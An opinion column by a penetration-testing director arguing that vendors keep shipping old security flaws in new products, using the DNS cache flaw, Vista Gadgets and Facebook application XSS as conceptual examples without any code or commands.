New tech, old threats

Opinion by Ken Munro

With flaws in many new products, vendors should listen a bit more to the research community perhaps

With flaws in many new products, vendors should listen a bit more to the research community perhaps.

With every advance in technology comes a new business benefit – but advancements also bring risks and threats. Vendors will always trumpet the advantages of their new products, so it falls to the independent security experts to uncover the potential pitfalls.

At the risk of talking myself out of a job, the question needs to be asked: why aren't vendors getting it right first time? It seems like every few days another security flaw or issue previously considered to be resolved pops up. Maybe it's the rush to get product to market that drives this, but surely it's as important to get secure product?

The much-discussed DNS vulnerability ‘discovered' by Dan Kaminsky illustrates that what goes around comes around in technology. DNS vulnerabilities have been known about for years. More recently, Ian Green submitted a paper for his 2005 GSEC certification, detailing the same issues that have sent everyone into a patching frenzy. However, new technology means bigger and better versions of the same threats, so we have to work smarter to eradicate them at source first time around.

Microsoft is oft-maligned, but the Vista beta programme was a great move towards delivering more secure code to market. Why don't all vendors embrace the security research community as Microsoft did? To its credit, it invested hugely and delayed product releases in order to accommodate a Secure Development Lifecycle.

Microsoft has made a real progress with security, but even it appears to have missed out on research into Vista Gadgets over the past couple of years. We have been looking at these in detail and made interesting discoveries.

Essentially, the Vista ‘Gadget' could provide a new vector for malware to enter a system. The latest version of Internet Explorer supports ‘Protected Mode', an excellent concept that prevents user files and content being modified without consent, and includes additional alerting capabilities to warn of malicious activity and attempts to reduce unwanted software installs. Unfortunately, the limitations do not apply to gadgets.

As gadgets are considered executable code, they are given permissions the same as HTAs or the Local Machine Zone Security configuration. This allows gadgets to initialise and script ActiveX controls not marked as ‘safe' for scripting and access data sources across domains.

An attacker could host hostile code on a web server under their control and propagate the malicious gadget through targeted email attacks, instant messaging networks and common spam.

This attack type is similar to what we have seen happen to another brand giant: Facebook. Unsurprisingly, hackers have turned their attention to the easiest attack vector in the social networking site: its hundreds of independent applications.

As with Vista's gadgets, applications can be independently created and made available to all users. These are privy to large amounts of sensitive data, all without clear user consent. Furthermore, they can be, and have been, subject to malicious XSS attacks, where a malicious user creates a link with an unwanted executable script into a website. When someone from Facebook clicks the link, the malicious script (usually JavaScript) can then send the victim's cookie away to a CGI script.

What unifies both Vista and Facebook is that there are no, or not stringent enough, authorisation mechanisms when processing gadget or application downloads. They rely on the apps/gadget developer to play by the rules.

As ever, the greatest weakness in computer security resides between the keyboard and the back of the chair. New technology and new/old threats go together like bees and honey, peas and carrots, Neo and Trinity. Fresh technology seduces us by offering bigger (smaller?), faster, stronger, when what we really need is cleaner, more secure – and with a giant flashing light that goes off whenever we attempt to do something stupid.

Ken Munro is director of SecureTest, the penetration and security testing division of NCC Group.


Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming Events